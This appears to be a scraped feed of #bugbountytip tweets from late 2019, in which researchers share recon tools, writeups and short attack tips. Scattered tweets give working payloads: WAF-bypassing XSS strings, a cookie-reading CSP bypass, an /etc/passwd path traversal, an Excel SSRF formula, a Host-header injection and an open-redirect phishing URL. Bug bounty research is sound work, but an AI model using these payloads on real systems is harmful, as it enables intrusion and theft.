0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-12 19:33:37
1 automatic screenshot tools,used to take a screenshots to large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best part of @SynackRedTeam is there missions. I rarely got change to grab one. But they are quick they pays and knowledge is bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial đŸ€© Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- đŸ€‘đŸ€‘đŸ€‘ Bug Bounty Tools — đŸ€©đŸ€© Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learn that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan not indexes. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (encorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
RĂ©my Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO
 #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO
 #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluzđŸ”„
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter a endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It đŸ”„đŸ’• #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-06 08:01:17
3 during a web pentesting operations when seeing a Registration page you should try register with an existing username, to see if you can enumerate users. this is what i saw on @PayPal you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluzđŸ”„
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-06 04:28:06
4 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and i am able to see all the information in incognito/different browser but When i loggin from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar AmerđŸ‡žđŸ‡Ÿ
@cry__pto


2019-10-04 13:37:36
2 The Multi-Tool Web Vulnerability Scanner. sometimes you may need to automate some work+ it may give you some ideas wget -O https://t.co/AVYJOtJVY1 https://t.co/eBwaz4GrYH && chmod +x https://t.co/AVYJOtJVY1 python https://t.co/AVYJOtJVY1 https://t.co/KdHhpMDaA0 #bugbountytip https://t.co/wMBgzbyvVx
Michele Romano
@Mik317_


2019-10-04 13:32:34
1 Bypassed a CSTI protection: {{alert(1)}} renders a <span> tag with value 1 ... JS not evaluated, but you can turn it in {{alert('<script>alert(1)</script>')}} and your day becomes a better day 😊 #bugbountytip
Shiva Kumawat
@ShivaKumawat88


2019-10-04 12:59:48
0 It ay be a bug at #amazon mobile app #AmazonRocketDeals #AmazonGreatIndianFestival #AmazonRiddler #JokerMovie #bugbountytip #techno Here is video link--- https://t.co/I16F6WSj85
Evan Custodio
@defparam


2019-10-04 12:18:43
0 If an app accepts XLSX to convert to PDF/HTML it may run the file through MS Excel to eval formulas/convert. Try testing =WEBSERVICE(https://t.co/VXyqysIsep) and see if XML/HTML is added to the form (insta-SSRF). No clue excel even had this function #bugbountytip #bugbountytips
Flawwan
@Flawwan


2019-10-04 10:29:30
0 New blog post: Abusing PHP strip tags to bypass modern WAF to exploit XSS. https://t.co/MXRTMOuoEV #BugBounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-04 09:41:07
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Khaled Mohamed
@xelkomy


2019-10-04 08:30:35
0 #xss #bugbountytip #xelkomy Reflected Xss in Ibm POC https://t.co/YOoDCKbYHe
Imran nissar
@Imrannissar3


2019-10-04 07:58:45
0 Password reset host header injection Host: https://t.co/cxR3o4EYIs Bypassed by Host:https://t.co/cxR3o4EYIs"><a href='https://t.co/wgqXnDuzXt> #bugbountytip #bugbounty @Hacker0x01 @Bugcrowd
Verneet
@err0rrrrr


2019-10-04 06:41:10
1 Bypass CSP with: <embed /: script allowscriptaccess = always src = javascript:alert(document.cookie); https://t.co/dIZsSFrPmX> Just bypassed a Taxi company CSP :p @LooseSecurity #bugbountytip #bugbounty #bugcrowd
Evan Custodio
@defparam


2019-10-04 00:06:57
0 @AldoTheCrott @NahamSec @Twitch HTML injection in a email callback where I could control the CC addr and parts of the body. #bugbountytip test adding HTML into email callbacks. If the email puts the email address in the body try adding HTML after a '+'-sign alias (e.g. foo+<B><BR>[email protected])
A hacker's life
@Unknownuser1806


2019-10-03 20:49:05
0 Open redirect payloads https://t.co/ObQYpkmvym #payload,#hacking, #bugbounty,#bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-10-03 20:08:23
0 Bug Bounty = Hardwork + Will Power + Dedication #bugbounty #bugbountytip #devsecops #devops #secops #cybersecurity #hacking https://t.co/o9uZTW5vDa
Fisher
@Regala_


2019-10-03 18:31:03
0 @rudra16t @zseano Are you learning? Are you improving? Are you a better hacker than what you were a year ago? You get imposter syndrome if you compare yourself to others. YOU are only one you should compare and compete with. #bugbountytip
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-10-03 15:39:29
0 #bugbountytips #bugbountytip Need help. Get good xss from cookie based xss. Any suggestion? Share your knowledge.
Masonhck357
@DanielM59720745


2019-10-03 14:56:24
0 #bugbountytip NEVER STOP DOING RECON: I ended up finding sensitive info on a subdomain that I found doing recon the second time around last week. I just found out that the subdomain is only used when they sell tickets for an event. They said that my timing was just perfect :)
intigriti
@intigriti


2019-10-03 14:18:30
9 Can't get CSRF with POST? Then GET it! Use 'change request method' in Burp Suite to check if the server also accepts GET requests. Thanks for the #BugBountyTip, @spaceraccoonsec! #HackWithIntigriti https://t.co/YVRPwZD6L0
bugbountytip
@a_l_e_r_t_1_


2019-10-03 08:05:53
1 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
bing0o
@hack1lab


2019-10-03 02:46:08
1 My new tool now on github, Web Technologies Detector, simple but useful for developers, penetration testers and bug hunters 😎 https://t.co/z5FF4P3v9j #bugbountytool #BugBountyTip #bing0o https://t.co/ewDkgbl1L4
bugbountytip
@a_l_e_r_t_1_


2019-10-02 21:04:44
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-02 17:14:40
9 CloudFront ~`XSSÂŽ payload, shake dice. đŸŽČ <iframe srcdoc=<svg/o&#x6Eload=alert(1)>> #BugBounty #BugBountyTip #WAF #infosec
dedsec
@dedsec211


2019-10-02 16:05:42
0 used this website to get Latest bug bounty related tweets #bugbountytip https://t.co/rWZ5mUNUnp
baluzđŸ”„
@haknfuk


2019-10-02 14:44:09
0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability đŸ€‘đŸ€‘đŸ€‘đŸ€‘ https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluzđŸ”„
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast in the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as a guests đŸ„ł #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! It release is specially dedicated to @SlackHQ! An issue that prevent pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
